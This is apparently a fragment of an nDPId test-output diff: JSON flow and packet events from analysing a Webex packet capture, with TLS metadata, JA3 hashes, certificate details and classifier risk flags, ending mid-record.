-00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1444570636363,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636363,"pkt":"ABoRAAACABoRAAABCABFAAAoAaNAABAGtX9ARGlhCggAAQG7yKr7mNWEBGcqfFAS\/\/8xvgAA"} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":313,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636364,"flow_last_seen":1444570636364,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636364,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37129,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":313,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1444570636364,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636364,"pkt":"ABoRAAACABoRAAABCABFAAA8Y+FAAEAGIywKCAABQERpYpEJAbvtraEaAAAAAKACOQh2dQAAAgQFtAQCCAoATML7AAAAAAEDAwY="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":314,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1444570636368,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636368,"pkt":"ABoRAAACABoRAAABCABFAAAoAaRAABAGtX1ARGliCggAAQG7kQkSUl7l7a2hG1AS\/\/9pXgAA"} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":315,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1444570636368,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636368,"pkt":"ABoRAAACABoRAAABCABFAAAo6IJAAEAGnp8KCAABQERpYciqAbsEZyp8+5jVhVAQOQj4tgAA"} -00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":316,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636359,"flow_last_seen":1444570636368,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636368,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.97","src_port":51370,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":318,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1444570636369,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636369,"pkt":"ABoRAAACABoRAAABCABFAAAoY+JAAEAGIz8KCAABQERpYpEJAbvtraEbElJe5lAQOQgwVwAA"} -00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":319,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636364,"flow_last_seen":1444570636369,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636369,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37129,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":321,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636387,"flow_last_seen":1444570636387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636387,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41386,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":321,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1444570636387,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636387,"pkt":"ABoRAAACABoRAAABCABFAAA82lhAAEAGrK8KCAABQERpZ6GqAbsG3RlZAAAAAKACOQjUWwAAAgQFtAQCCAoATMMBAAAAAAEDAwY="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":322,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1444570636395,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636395,"pkt":"ABoRAAACABoRAAABCABFAAAoAadAABAGtXVARGlnCggAAQG7oar5IuamBt0ZWlAS\/\/9YuAAA"} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":323,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1444570636395,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636395,"pkt":"ABoRAAACABoRAAABCABFAAAo2llAAEAGrMIKCAABQERpZ6GqAbsG3Rla+SLmp1AQOQgfsQAA"} -00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":324,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636387,"flow_last_seen":1444570636397,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636397,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41386,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01401{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":328,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636180,"flow_last_seen":1444570636471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1444570636471,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.231.3","src_port":45814,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -01404{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":335,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636160,"flow_last_seen":1444570636701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"thread_ts_msec":1444570636701,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"209.197.222.159","src_port":47498,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":336,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636248,"flow_last_seen":1444570636703,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":500,"midstream":0,"thread_ts_msec":1444570636703,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.104.140","src_port":44492,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -01401{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":341,"source":"webex.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636255,"flow_last_seen":1444570636706,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2920,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1444570636706,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.4.76","src_port":52730,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":347,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636170,"flow_last_seen":1444570636773,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"thread_ts_msec":1444570636773,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.153","src_port":57647,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -01401{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":355,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636364,"flow_last_seen":1444570636827,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":667,"midstream":0,"thread_ts_msec":1444570636827,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37129,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":356,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636387,"flow_last_seen":1444570636828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":667,"midstream":0,"thread_ts_msec":1444570636828,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41386,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -01401{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":357,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636359,"flow_last_seen":1444570636829,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":500,"midstream":0,"thread_ts_msec":1444570636829,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.97","src_port":51370,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":365,"source":"webex.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636259,"flow_last_seen":1444570636894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":667,"midstream":0,"thread_ts_msec":1444570636894,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.100","src_port":52219,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -01401{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":368,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636264,"flow_last_seen":1444570636897,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":667,"midstream":0,"thread_ts_msec":1444570636897,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.99","src_port":55969,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":381,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636155,"flow_last_seen":1444570636963,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1444570636963,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51646,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570624853,"flow_last_seen":1444570624853,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570624853,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41346,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1444570624853,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570624853,"pkt":"ABoRAAACABoRAAABCABFAAA8OXNAAEAGTZUKCAABQERpZ6GCAbtPGIcMAAAAAKACOQgjFwAAAgQFtAQCCAoATL5\/AAAAAAEDAwY="} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1444570624860,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570624860,"pkt":"ABoRAAACABoRAAABCABFAAAoAQ5AABAGtg5ARGlnCggAAQG7oYKw53jzTxiHDVAS\/\/9Y4AAA"} +00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1444570624860,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570624860,"pkt":"ABoRAAACABoRAAABCABFAAAoOXRAAEAGTagKCAABQERpZ6GCAbtPGIcNsOd49FAQOQgf2QAA"} +00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570624853,"flow_last_seen":1444570624860,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1444570624860,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41346,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01308{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570624853,"flow_last_seen":1444570625424,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2720,"flow_tot_l4_payload_len":4134,"flow_avg_l4_payload_len":516,"midstream":0,"thread_ts_msec":1444570625424,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41346,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": 